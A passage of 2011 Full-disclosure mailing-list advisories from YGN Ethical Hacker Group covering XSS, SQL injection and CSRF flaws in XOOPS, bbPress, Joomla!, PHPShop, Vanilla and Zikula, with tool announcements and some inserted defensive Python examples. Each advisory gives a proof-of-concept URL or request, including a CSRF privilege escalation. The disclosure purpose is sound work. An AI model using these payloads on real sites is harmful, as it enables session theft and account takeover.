Upgrade to XOOPS 2.5.1 or higher


7. VENDOR

XOOPS Development Team
http://xoops.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-03-10: notified vendor
2011-03-16: vendor released fixed version
2011-03-18: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[xoops_2.5.0]_cross_site_scripting
Vendor Announcement: http://xoops.org/modules/news/article.php?storyid=5851
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-03-18]



[Full-disclosure] bbPress 1.0.2 <= Cross Site Scripting Vulnerability

2011-03-13 Thread YGN Ethical Hacker Group
===================================================
bbPress 1.0.2 <= Cross Site Scripting Vulnerability
===================================================



1. OVERVIEW

bbPress 1.0.2 and lower versions were vulnerable to Cross Site Scripting.


2. APPLICATION DESCRIPTION

bbPress is plain and simple forum software, plain and simple with a
twist from the creators of WordPress.
It is focused on web standards, ease of use, ease of integration, and speed.


3. VULNERABILITY DESCRIPTION

The Query String was not properly sanitized upon submission to the
/index.php URL, which allows an attacker to conduct a Cross Site
Scripting attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.
If a user has already logged in to the application, an XSS attack will
execute promptly.
If not, it will execute after the user successfully logs in.


4. VERSIONS AFFECTED

bbPress 1.0.2 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/bb-login.php?re=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiWFNTXG4iK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4%3D


6. SOLUTION

Upgrade to 1.0.3 or higher


7. VENDOR

bbPress Development Team
http://bbpress.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-23: notified vendor
2011-02-24: vendor released fixed version
2011-03-13: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[bbpress-1.0.2]_cross_site_scripting
About bbPress: http://bbpress.org/about/


#yehg [2011-03-13]



[Full-disclosure] [new tool announcement] host-extract

2011-03-13 Thread YGN Ethical Hacker Group
Host-Extract | Host/IP Pattern Extractor
===

category: /pentest/enumeration/www
useful area: blackbox testing


This little ruby script tries to extract all IP/Host patterns in page
response of a given URL and JavaScript/CSS files of that URL.

With it, you can quickly identify internal IPs/Hostnames, development
IPs/ports, cdn, load balancers, additional attack entries related to
your target that are revealed in inline js, css, html comment areas
and js/css files.

This is unlike a web crawler, which looks for new links only in anchor
tags (<a>) or the like.

In some cases, host-extract may give you false positives when there
are some words like - main-site_ver_10.2.1.3.swf.

With -v option, you can ask the tool to output html view-source
snippets for each IP/Domain extracted. This will shorten your manual
analysis time.

Please go to http://host-extract.googlecode.com/ for more info.


Download/Update
==
svn co http://host-extract.googlecode.com/svn/trunk/ host-extract


Tutorial Wiki
==

Sebastien Damaye from aldeid.com has prepared a thorough host-extract
tutorial with real-world famous web sites.

http://aldeid.com/index.php/Host-extract


Bugs/Suggestions Report
===

Please report bugs/suggestions to host-extract at yehg.net.
Thanks for your contribution.

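The announcement above describes what host-extract does (pull IP/host patterns out of inline JS, CSS and HTML comments), its false positives on names like main-site_ver_10.2.1.3.swf, and the -v snippet output. The Python below is an added example of that extraction logic written for this page, not the host-extract script itself; the HTML response it scans is a constructed sample, and the small TLD allowlist is this example's simplification (a real extractor would carry a full TLD list).

```python
import re

# Constructed sample response (inline JS, CSS link, HTML comment); not a real site.
SAMPLE_PAGE = """<html><head>
<!-- staging copy: http://dev-api.example.com:8081/ -->
<link rel="stylesheet" href="http://static.cdn-example.net/css/main.css">
<script>
  var apiHost = "10.0.0.12:8080";                     // internal API behind the load balancer
  var flash   = "/media/main-site_ver_10.2.1.3.swf";  // looks like an IP, is not
  var lb      = "lb01.corp.example.com";
  window.location.href = "/index.php";
</script>
</head><body></body></html>"""

# Assumed TLD allowlist for this example only; keeps "main.css" and
# "window.location.href" from being reported as hosts.
TLDS = {"com", "net", "org", "in", "io", "uk", "de"}

IP_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
HOST_RE = re.compile(r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}", re.I)


def _clean_context(text, start, end):
    """Reject matches glued to an identifier or file name, e.g. the
    10.2.1.3 inside main-site_ver_10.2.1.3.swf."""
    before = text[start - 1] if start > 0 else ""
    after = text[end:end + 2]
    if before and (before.isalnum() or before in "_.-"):
        return False
    if after[:1] and (after[0].isalnum() or after[0] in "_-"):
        return False
    if after[:1] == "." and after[1:2].isalpha():     # followed by a file extension
        return False
    return True


def extract_hosts(text, context=30):
    """Return {indicator: [source snippets]} for every IP and hostname found
    anywhere in the text (not only in anchor tags), with a short view-source
    snippet around each hit in the spirit of host-extract's -v output."""
    found = {}

    def record(value, start, end):
        snippet = text[max(0, start - context):end + context].strip()
        found.setdefault(value, []).append(snippet)

    for m in IP_RE.finditer(text):
        octets = m.group(0).split(".")
        if all(int(o) <= 255 for o in octets) and _clean_context(text, m.start(), m.end()):
            record(m.group(0), m.start(), m.end())
    for m in HOST_RE.finditer(text):
        host = m.group(0).lower()
        if host.rsplit(".", 1)[1] in TLDS and _clean_context(text, m.start(), m.end()):
            record(host, m.start(), m.end())
    return found


if __name__ == "__main__":
    for indicator, snippets in sorted(extract_hosts(SAMPLE_PAGE).items()):
        print(indicator)
        for s in snippets:
            print("   ...", s, "...")
```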


[Full-disclosure] Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability

2011-03-13 Thread YGN Ethical Hacker Group
==
 Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

Joomla! 1.6.0 was vulnerable to Cross Site Scripting.


2. PRODUCT DESCRIPTION

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

The Query String parameter was not properly sanitized upon submission
to the /index.php URL, which allows an attacker to conduct a Cross Site
Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's
browser.


4. VERSION AFFECTED

Joomla! 1.6.0


5. PROOF-OF-CONCEPT/EXPLOIT

 SEO-enabled Joomla 1.6.0

http://attacker.in/joomla160/index.php/%2522%253E%253Cimg%2520src%253Da%2520onerror%253Dalert(String.fromCharCode(88,83,83))%253E09739572178%252F

http://attacker.in/joomla160/index.php/using-joomla/extensions/components/search-component/search/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E

http://attacker.in/joomla160/index.php/contact-us/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E

http://attacker.in/joomla160/index.php/park-links?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1

http://attacker.in/joomla160/index.php/using-joomla/extensions/templates?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1


 SEO-disabled Joomla 1.6.0

http://attacker.in/joomla160x/index.php?option=com_weblinksview=categoryid=18Itemid=227a86a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9666d64388c=1

http://attacker.in/joomla160x/index.php?option=com_contentview=categorylayout=blogid=21Itemid=268%2522%253e%253cscript%253ealert%280%29%253c/script%253e=XSS


This is exactly the same variant as shown in our demo video last year
for 1.5.20:

http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/

We thought Joomla! team would fix this issue in 1.6.0 stable release
whilst they fixed it in Joomla! 1.5.21!


6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.6.1 or higher


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-01-24: notified vendor
2011-03-08: vendor released fix
2011-03-14: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_cross_site_scripting(XSS)
Former Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-03-14]




-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd


[Full-disclosure] Joomla! 1.6.0 | SQL Injection Vulnerability

2011-03-13 Thread YGN Ethical Hacker Group
=
 Joomla! 1.6.0 | SQL Injection Vulnerability
=


1. OVERVIEW

Joomla! 1.6.0 was vulnerable to SQL Injection.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

The parameters filter_order and filter_order_Dir were not properly
sanitized in Joomla!, which led to an SQL Injection vulnerability.
This could allow an attacker to inject or manipulate SQL queries in
the back-end database, allowing for the manipulation or disclosure of
arbitrary data.


4. VERSION AFFECTED

Joomla! 1.6.0


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.aAAA,filter_order_Dir=2limit=3limitstart=4


http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,filter_order_Dir=yehg.net.,limit=3limitstart=4


This is the exact same variant as shown in Joomla! 1.5.21:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5_21]_sql_injection

We thought the Joomla! team would fix this issue in the 1.6.0 stable
release, since they had fixed it in Joomla! 1.5.22!
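As an added example (not Joomla!'s or the advisory's code) of the hardening this advisory implies for filter_order and filter_order_Dir: the concatenation pattern the advisory describes beside an allowlist mapping, since ORDER BY columns and directions cannot be bound as query parameters. The column names, table layout and sample rows are assumptions.

```python
"""Allowlist validation for user-controlled ORDER BY parameters.

Added example, not Joomla! code. The advisory above reports that the
filter_order and filter_order_Dir request parameters reached the SQL
query unsanitized. A column name or sort direction cannot be bound as a
prepared-statement parameter, so the defence is to map the request
value onto a fixed table of known columns and directions and to reject
anything that is not in it. The column names below are assumptions.
"""
import sqlite3

# Hypothetical allowlist: value accepted from the request -> column used in SQL.
ORDER_COLUMNS = {
    "a.title": "a.title",
    "a.created": "a.created",
    "a.hits": "a.hits",
}
ORDER_DIRECTIONS = {"ASC": "ASC", "DESC": "DESC"}


class BadOrderParameter(ValueError):
    """Raised when a request value is not on the allowlist."""


def unsafe_order_clause(filter_order, filter_order_dir):
    """The pattern the advisory describes: request values concatenated as-is.

    A value such as 'yehg.net.aAAA' lands unchanged in the query text, so
    the database parses attacker-controlled SQL.
    """
    return f"ORDER BY {filter_order} {filter_order_dir}"


def build_order_clause(filter_order, filter_order_dir="ASC"):
    """Hardened form: only allowlisted values ever reach the SQL text."""
    column = ORDER_COLUMNS.get(filter_order)
    if column is None:
        raise BadOrderParameter(f"unknown filter_order: {filter_order!r}")
    direction = ORDER_DIRECTIONS.get(str(filter_order_dir).upper())
    if direction is None:
        raise BadOrderParameter(
            f"unknown filter_order_Dir: {filter_order_dir!r}")
    return f"ORDER BY {column} {direction}"


def list_articles(conn, filter_order, filter_order_dir, limit, limitstart):
    """Run a category listing with the hardened clause; LIMIT/OFFSET are bound."""
    sql = ("SELECT a.id, a.title FROM content a "
           + build_order_clause(filter_order, filter_order_dir)
           + " LIMIT ? OFFSET ?")
    return conn.execute(sql, (int(limit), int(limitstart))).fetchall()


def sample_db():
    """Constructed in-memory table standing in for the CMS content table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content "
                 "(id INTEGER, title TEXT, created TEXT, hits INTEGER)")
    conn.executemany("INSERT INTO content VALUES (?, ?, ?, ?)", [
        (1, "Alpha", "2011-01-01", 5),
        (2, "Beta", "2011-01-02", 9),
        (3, "Gamma", "2011-01-03", 2),
    ])
    return conn


if __name__ == "__main__":
    db = sample_db()
    print(list_articles(db, "a.hits", "desc", limit=2, limitstart=0))
    try:
        build_order_clause("yehg.net.aAAA", "2")
    except BadOrderParameter as exc:
        print("rejected:", exc)
```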


6. SOLUTION

Upgrade to Joomla! 1.6.1 or higher


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-24: notified vendor
2011-03-08: vendor released fix
2011-03-14: vulnerability disclosed


10. REFERENCES

Vendor Advisory URL:
http://developer.joomla.org/security/news/328-20110201-core-sql-injection-path-disclosure.html
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_sql_injection
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-89: http://cwe.mitre.org/data/definitions/89.html


#yehg [2011-03-14]




[Full-disclosure] PHPShop 0.8.1 <= | Cross Site Scripting Vulnerability

2011-02-24 Thread YGN Ethical Hacker Group

PHPShop 0.8.1 <= | Cross Site Scripting Vulnerability



1. OVERVIEW

The PHPShop 0.8.1 and lower versions are currently vulnerable to Cross
Site Scripting.


2. BACKGROUND

PHPShop is a PHP-powered shopping cart application. It is released
under the GNU General Public License.
The primary purpose of PHPShop is to provide a simple shopping cart
solution that is easy to customize to suit any purpose. PHPShop has
fewer features than many other shopping cart applications, but is
generally easier to customize.


3. VULNERABILITY DESCRIPTION

The Query String was not properly sanitized upon submission to the
/index.php URL, which allows an attacker to conduct a Cross Site
Scripting attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

PHPShop 0.8.1 <=


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/phpshop0_8_1/?page=store/XSS%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1


6. SOLUTION

The vendor has discontinued this product.
It is recommended that an alternate software package be used in its place.


7. VENDOR

PHPShop Development Team
http://phpshop.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-02-25: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpshop_0.8.1]_cross_site_scripting
Project Home: http://code.google.com/p/phpshop/,
http://sourceforge.net/projects/phpshop/
PHPShop Download Stats:
http://sourceforge.net/projects/phpshop/files/phpshop/0.8.1/stats/timeline?dates=2010-01-01+to+2010-01-01
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-02-25]



[Full-disclosure] Vanilla Forums 2.0.17.1 ~ 2.0.17.5 <= Cross Site Scripting Vulnerability

2011-02-22 Thread YGN Ethical Hacker Group
1. OVERVIEW

Vanilla Forums 2.0.17.1 through 2.0.17.5 were vulnerable to Cross
Site Scripting.


2. BACKGROUND

Vanilla Forums are open-source, standards-compliant, customizable
discussion forums. It is specially made to help small communities grow
larger through SEO mojo, totally customizable social tools, and great
user experience. Vanilla is also built with integration at the
forefront, so it can seamlessly integrate with your existing website,
blog, or custom-built application.


3. VULNERABILITY DESCRIPTION

The 'p' parameter was not properly sanitized upon submission to the
/index.php URL, which allows an attacker to conduct a Cross Site
Scripting attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

2.0.17.1 ~ 2.0.17.5


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/vanilla/index.php?p=/entry/;scriptalert(/XSS/)/script


6. SOLUTION

Upgrade to Vanilla Forums 2.0.17.6 or higher


7. VENDOR

Vanilla Forums Development Team
http://vanillaforums.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-01-25: notified vendor
2011-01-27: vendor released fix
2011-02-22: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.17.5]_cross_site_scripting
Github Issue Report:
https://github.com/vanillaforums/Garden/issuesearch?state=closedq=xss#issue/750
Vendor Commit: 
https://github.com/vanillaforums/Garden/commit/0a22506c76ac419d390d5d1bde5ec5f48b195358
Vendor Release:
http://vanillaforums.org/discussion/14397/vanilla-2.0.17-released/
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-02-22]




[Full-disclosure] Zikula CMS 1.2.4 <= Cross Site Request Forgery (CSRF) Vulnerability

2011-02-01 Thread YGN Ethical Hacker Group

Zikula CMS 1.2.4 <= Cross Site Request Forgery (CSRF) Vulnerability



1. OVERVIEW

The Zikula 1.2.4 and lower versions were vulnerable to Cross Site
Request Forgery (CSRF).


2. BACKGROUND

Zikula is a Web Application Toolkit, which allows you to run
impressive websites and build powerful online applications. Zikula has
received praise for many things, but we believe the highlights are
ease of use, quick and easy development, security and performance and
lastly flexibility.


3. VULNERABILITY DESCRIPTION

Zikula CMS 1.2.4 and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions in the majority of
administrator functions, such as adding a new user or assigning a user
administrative privileges. By using a crafted URL, an attacker may
trick the victim into visiting his web page to take advantage of the
trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

1.2.4 <=


5. PROOF-OF-CONCEPT/EXPLOIT

The following request escalates a normal user to an administrator.

[REQUEST]
POST /zikula/index.php?module=userstype=adminfunc=processusersop=edit
HTTP/1.1

authid=userid=3do=yesaccess_permissions%5B%5D=2access_permissions%5B%5D=1uname=testeremail=tester%40yehg.netpass=vpass=activated=1theme=submit=
[/REQUEST]


6. SOLUTION

Upgrade to Zikula 1.2.5 or higher


7. VENDOR

Zikula Foundation
http://zikula.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-24: notified vendor
2011-01-25: vendor released fix
2011-02-01: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/
Vendor Released Info:
http://community.zikula.org/index.php?module=Newsfunc=displaysid=3041title=zikula-1.2.5-released
Zikula 1.2.5 Changelog:
http://code.zikula.org/core12/browser/tags/Zikula-1.2.5/src/docs/CHANGELOG
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery


#yehg [2011-02-01]



[Full-disclosure] [Tool Update Announcement] inspathx - Path Disclosure Finder

2011-02-01 Thread YGN Ethical Hacker Group
Check the update via

svn checkout http://inspathx.googlecode.com/svn/trunk/ inspathx


CHANGELOG
===

covered remaining checks (empty array, null cookie) in
Full_Path_Disclosure
(http://www.owasp.org/index.php/Full_Path_Disclosure) of OWASP
Application Security Desk Reference (ASDR) Project
(http://www.owasp.org/index.php/Category:OWASP_ASDR_Project)

added support for generating a path definition file; you can now use
-d with a path-definition file to check, in addition to a CMS
directory path

added support for reading gzip/deflate compressed response from server

added regexp support (use your own regexp rules to search in returned
responses in addition to built-in regexp error messages)

added null session cookie support
--null-cookie [will auto null session for all languages]

added custom headers support
--headers cookie: sid[%00]=1\r\nX-pingback:: %00

added data (GET/POST) support
--data (var=1&var=2)

added method (get by default) support
--method post

added follow redirect support
--follow-redirect

added cold fusion language support; when fed large inputs, cold fusion
apps without boundary checks tend to disclose source code when used as
IIS ISAPI extensions

added --rm option to remove directory used to generate path list
[suggestion by Brendan Coles]

cleaned *-vuln-path.txt file content to make it ready for path definition file

added support for [] , querystring in path definition file [suggestion
by Brendan Coles]

added support for username and web root path extraction for both
*nix and windows [suggestion by Brendan Coles]

added detection support for html_errors being set as off in php.ini
[suggestion by Sebastien Damaye]
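As an added example, not inspathx's own code, of the detection the changelog describes (the html_errors on/off forms of a PHP error, and username and web root extraction for both *nix and Windows paths): a scanner run over constructed sample responses. The marker directory names and the sample pages are assumptions.

```python
"""Detect PHP full path disclosure in HTTP response bodies.

Added example, not inspathx's own code. It looks for the two formats in
which PHP prints an error (html_errors on: "<b>Warning</b>: ... in
<b>/path/file.php</b> on line <b>N</b>"; html_errors off: "Warning: ...
in /path/file.php on line N"), pulls out the leaked script path, and
derives the web root and, where the path lies under a home directory or
user profile, the account name, for both *nix and Windows layouts. The
marker directory names and the sample pages are assumptions.
"""
import re

# One PHP diagnostic line in either html_errors mode. A *nix path cannot
# contain whitespace here; a Windows path may ("Documents and Settings").
PHP_ERROR = re.compile(
    r"(?P<level>Warning|Notice|Fatal error|Parse error|Deprecated)(?:</b>)?:\s*"
    r"(?P<msg>[^\r\n]*?)\s+in\s+(?:<b>)?"
    r"(?P<path>[A-Za-z]:\\[^<\r\n]+?|/[^<\s]+?)(?:</b>)?"
    r"\s+on\s+line\s+(?:<b>)?(?P<line>\d+)"
)
UNIX_HOME = re.compile(r"^/home/(?P<user>[^/]+)/")
WIN_PROFILE = re.compile(
    r"^[A-Za-z]:\\(?:Users|Documents and Settings)\\(?P<user>[^\\]+)\\", re.I)
# Directory names that conventionally sit at the document root (assumed).
WEB_ROOT_MARKERS = {"public_html", "htdocs", "wwwroot", "www", "html"}


def web_root(path):
    """Best-effort document root: up to a known marker, else the script's dir."""
    sep = "\\" if re.match(r"^[A-Za-z]:\\", path) else "/"
    parts = path.split(sep)
    for i, part in enumerate(parts[:-1]):
        if part.lower() in WEB_ROOT_MARKERS:
            return sep.join(parts[:i + 1])
    return sep.join(parts[:-1])


def account_name(path):
    """Username implied by a home-directory or profile path, if any."""
    m = UNIX_HOME.match(path) or WIN_PROFILE.match(path)
    return m.group("user") if m else None


def find_path_disclosures(body):
    """Return one record per leaked path found in a response body."""
    findings = []
    for m in PHP_ERROR.finditer(body):
        path = m.group("path")
        findings.append({
            "level": m.group("level"),
            "path": path,
            "line": int(m.group("line")),
            "web_root": web_root(path),
            "user": account_name(path),
            # "</b>" right after the level only appears when html_errors is on.
            "html_errors": m.group(0).startswith(m.group("level") + "</b>"),
        })
    return findings


# Constructed sample responses (not captured from any real site).
SAMPLE_HTML = (
    "<html><body><br />\n<b>Warning</b>:  array_merge(): Argument #1 is not "
    "an array in <b>/home/acme/public_html/lib/adodb/adodb.inc.php</b> on "
    "line <b>42</b><br />\n</body></html>"
)
SAMPLE_TEXT = (
    "Notice: Undefined index: sid in C:\\inetpub\\wwwroot\\shop\\index.php "
    "on line 17\n"
)
SAMPLE_PROFILE = (
    "Fatal error: Call to undefined function mysql_connect() in "
    "C:\\Documents and Settings\\bob\\My Documents\\www\\app\\db.php on line 3"
)
CLEAN = "<html><body>Welcome, nothing to see here.</body></html>"

if __name__ == "__main__":
    for page in (SAMPLE_HTML, SAMPLE_TEXT, SAMPLE_PROFILE, CLEAN):
        for hit in find_path_disclosures(page):
            print(hit)
```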



THANKS
===


Ryan Dewhurst (http://www.ethicalhack3r.co.uk) for his suggestion to
cover all checks (empty array, null cookie) of
http://www.owasp.org/index.php/Full_Path_Disclosure:
--data, --param-array, -n/--null-session options.


Brendan Coles (http://itsecuritysolutions.org/, http://whatweb.net/)
for his suggestion that known web application paths should be bundled
for convenience and time saving. I've made files with the known paths
of dozens of open-source web apps under the 'paths' directory. You can
do the same for your desired CMS/application with the -d and -g
options. See EXAMPLES for more details. Submit the latest path files
to inspathx at yehg.net.


Sebastien Damaye for his write-up and tutorial about inspathx,
http://www.aldeid.com/index.php/Inspathx


And finally to the developer community, whose common coding practice
and belief that path disclosure is a server-side issue make this tool
meaningful and usable for current and future web apps.



100+ Web Apps with Full Path Disclosure using inspathx
===

https://code.google.com/p/inspathx/source/browse/#svn%2Ftrunk%2Fpaths_vuln


* Send bugs/suggestions to inspathx at yehg.net



[Full-disclosure] Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability

2011-01-27 Thread YGN Ethical Hacker Group
==
Vanilla Forums 2.0.16 <= Cross Site Scripting Vulnerability
==


1. OVERVIEW

The Vanilla Forums 2.0.16 and lower versions were vulnerable to Cross
Site Scripting.


2. BACKGROUND

Vanilla Forums are open-source, standards-compliant, customizable
discussion forums. It is specially made to help small communities grow
larger through SEO mojo, totally customizable social tools, and great
user experience. Vanilla is also built with integration at the
forefront, so it can seamlessly integrate with your existing website,
blog, or custom-built application.


3. VULNERABILITY DESCRIPTION

The 'Target' parameter was not properly sanitized after a user logs
in, which allows an attacker to conduct a Cross Site Scripting attack.
An attacker could prepare a link in a forum post that includes a link
to a file which seems to require authentication.
Upon logging in, the user will get XSSed.


4. VERSIONS AFFECTED

2.0.16 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://vanilla/index.php?p=/entry/signinTarget=javascript:alert(document.cookie)//http://


6. SOLUTION

Upgrade to Vanilla Forums 2.0.17 or higher


7. VENDOR

Vanilla Forums Development Team
http://vanillaforums.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-14: notified vendor
2011-01-18: vendor released fix
2011-01-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[vanilla_forums-2.0.16]_cross_site_scripting
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-01-27]



[Full-disclosure] Multiple Web Applications | Full Path Disclosure

2011-01-27 Thread YGN Ethical Hacker Group
The following web applications are found to have full path disclosure
flaws (Ref: WASC-13, CWE-200).

-


htmlpurifier-4.2.0
phpids-0.6.5
PhpSecInfo
111WebCalendar-1.2.3
adodb
aef-1.0.8
ATutor-2.0
auth
b2evolution-3.3.3
bbpress-1.0.2
cftp-r80
claroline-1.9.7
clipbucket_2.0.9_stable_Fr
cmsmadesimple-1.9.2
CodeIgniter_1.7.2
concrete5.4.0.5
concrete5.4.1.1
CopperminePhotoGallery-1.5.12
craftysyntax3.0.2
CubeCart-4.4.3
dokuwiki-2009-12-25c
Dolphin-7.0.4
dotproject-2.1.4
drupal-7.0
e107_0.7.24
eggblog_4.1.2
elgg-1.7.6
ExoPHPDesk_1.2.1
eyeOS-2.2.0.0
fengoffice_1.7.2
freeway_1_5_alpha_Burstow
frontaccounting-2.3.1
helpcenterlive-2.1.7
hesk-2.2
jcow.4.2.1
joomla-1.6.0
kamads-2_b3
kplaylist.1.8.502
lifetype-1.2.10
limesurvey190plus-build9642-20101214
linpha-1.3.4
mambo-4.6.5
mantisbt-1.2.4
moodle-2.0.1
mound-2.1.6
mybb-1.6
nucleus3.61
NuSOAP
open-realty-2.5.8
OpenBlog-1.2.1
opencart_v1.4.9.3
opendocman-1.2.6-svn-2011-01-21
orangehrm-2.6.0.2
oscommerce-3.0a5
phorum-5.2.15a
PHP-Easy-Survey-Package-2.1.1
PHP-Nuke-8.0
PHP-Point-Of-Sale-10.7
phpads-2.0
phpAlbum_v0.4.1.14.fix06
phpBook-2.1.0
phpcollab-2.5
PHPDevShell-V3.0.0-Beta-4b
PHPfileNavigator-2.3.3
phpFormGen-2.09
phpfreechat-1.3
PhpGedView-all-4.2.3
phpicalendar-2.4
phpld-2-151.2.0
phpmyfaq-2.6.13
phprojekt-6.0.5
phpScheduleIt_1.2.12
phpwcms-1.4.7r412
piwigo-2.1.5
piwik-1.1
pixelpost_v1.7.3
pixie_v1.04
PliggCMS1.1.3
podcastgen1.3
prestashop_1.4.0.6
projectpier-0.8.0.3
serendipity-1.5.5
Smarty
statusnet-0.9.6
SugarCRM-6.1.0
taskfreak-multi-mysql-0.6
tcexam_11.1.015
textpattern-4.2.0
thebuggenie_2.1.2
theHostingTool-v1.2.3
TinyMCE
TinyWebGallery-1.8.3
tomatocart-1.1.3
vanilla-2.0.16
WebCalendar-1.2.3
WeBid-1.0.0
webinsta-mail-list-1.3e
WebsiteBaker_2.8.1
wordpress-3.0.4
xajax
xoops-2.5.0
YOURS
Zend
zikula-1.2.4




The list of vulnerable files for each application can be found at

